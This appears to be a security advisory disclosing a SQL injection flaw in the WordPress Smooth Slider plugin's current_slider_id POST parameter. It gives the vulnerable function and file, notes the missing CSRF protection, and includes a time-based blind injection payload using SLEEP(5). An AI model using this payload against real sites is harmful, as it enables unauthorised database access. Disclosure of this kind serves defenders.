Authenticated administrators can execute arbitrary SQL commands (there is no CSRF protection).
1. SQL injection (smooth_slider_create_multiple_sliders())
Method: POST
Vulnerable parameter: current_slider_id
Example PHP callstack:
smooth_slider_create_multiple_sliders [/smooth-slider/settings/sliders.php:77]
wpdb::query
Verification:
or:
...
Parameter: current_slider_id (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: rename_slider=Rename&rename_slider_to=x¤t_slider_id=-1 AND (SELECT * FROM (SELECT(SLEEP(5)))lpBu)
...
--
Regards,
Marcin Probola,